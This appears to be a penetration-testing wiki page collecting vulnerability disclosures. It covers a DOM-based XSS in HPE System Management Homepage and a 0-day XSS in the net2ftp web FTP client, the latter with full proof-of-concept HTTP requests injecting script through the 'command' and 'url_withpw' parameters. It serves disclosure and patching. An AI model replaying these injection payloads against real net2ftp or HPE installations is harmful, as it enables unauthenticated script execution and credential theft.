Tag: xss

Penetration Testing Wiki

HPE SMH XSS DOM-Based Advisory

Product: HPE System Management HomepageVersions: ALL versions and platforms affected (Tested on v7.6.0.11 for MS Windows)Vulnerability: JavaScript Injection in file gsearch.php, parameter prodOWASP TOP 10: A1 InjectionType: Javascript InjectionImpact: Allows an attacker to perform an XSS (Cross-Site Scripting) DOM-based attack, execute arbitrary JavaScript client-side, steal admin credentials, etcAccess Vector: Adjacent NetworksAccess Complexity: LowAuthentication: NoneCVE: CVE-2017-12544…
Read more

CVE-2017-12544 Hewlett Packard Enterprise, HP System Management Homepage Software prior to 7.6.1 Cross-site Scripting (XSS)

The HP System Management Homepage (SMH) is a web-based interface that consolidates and simplifies the management of ProLiant and Integrity servers running Microsoft Windows or Linux, or HP 9000 and HP Integrity servers running HP-UX 11i. https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us Original Advisory: https://www.securityfocus.com/archive/1/541823/30/0/threaded

[0day] net2ftp multiple XSS on unauthenticated users

Summary Subject: net2ftp XSS in “command” and “url_withpw” parametersVersions vulnerable: ALL (Tested on latest, version 1.0)Category: 0-dayImpact: Medium Description of the product net2ftp is a web based FTP client (http://www.net2ftp.com/index.php).It can be used as a standalone version and also integrated in some web platforms as ISP providers, e-commerce sites and other websites. Description of the vulnerabilities Doing a vulnerability research on net2ftp, latest version 1.0. Jacobo Avariento had found several cross-site scripting (XSS) found in skins/shinra/bookmark1.template.php (line 18) “url_withpw” parameter, and in skins/shinra/raw1.template.php (line 5) with “command” parameter. The first, parameter “url_withpw” is triggered when the user is placing a bookmark on that FTP connection. The second, parameter “command”, is triggered when the user access the FTP interactive mode for sending FTP arbitrary commands to the server. Proof of concept XSS in parameter “command” POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1Host: 192.168.1.103User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.phpCookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmfConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 391 ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&sort=&sortorder=&state=raw&state2=main&directory=%2F&screen=&command=CWD+%0D%0APWD%0D%0A%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E&text=501+Invalid+number+of+arguments%0D%0A257+%22%2F%22+is+the+current+directory%0D%0A XSS in parameter “url_withpw” POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1Host: 192.168.1.103User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.phpCookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmfConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 1141 ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&sort=&sortorder=&state=bookmark&state2=main&directory=%2F&url_withpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bpassword_encrypted%3D%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Draw%26amp%3Bstate2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D%22%3C%2Fa%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E&url_withoutpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Dlogin_small%26amp%3Bstate2%3Dbookmark%26amp%3Bgo_to_state%3Draw%26amp%3Bgo_to_state2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D&text=net2ftp+192.168.1.103 Impact Due to a possible lack of validation of cookie and session parameters it is possible to trigger the attacks directly, without need to log in in the server or the website. Because of this circumstances, the risk of the vulnerability is tagged as “medium” as there is no authentication and can be triggered in any net2ftp software online. It has been proved that several ISP providers use this software for their clients, among other customers. Timeline Jul 24/2016: The vendor has been already contacted, no reply until date of public diclosure. Further Actions We recommend all sysadmins and web developers who are using net2ftp software to review the files skins/shinra/bookmark1.template.php and skins/shinra/raw1.template.php manually, and patch the XSS because no official patches are released or planned yet.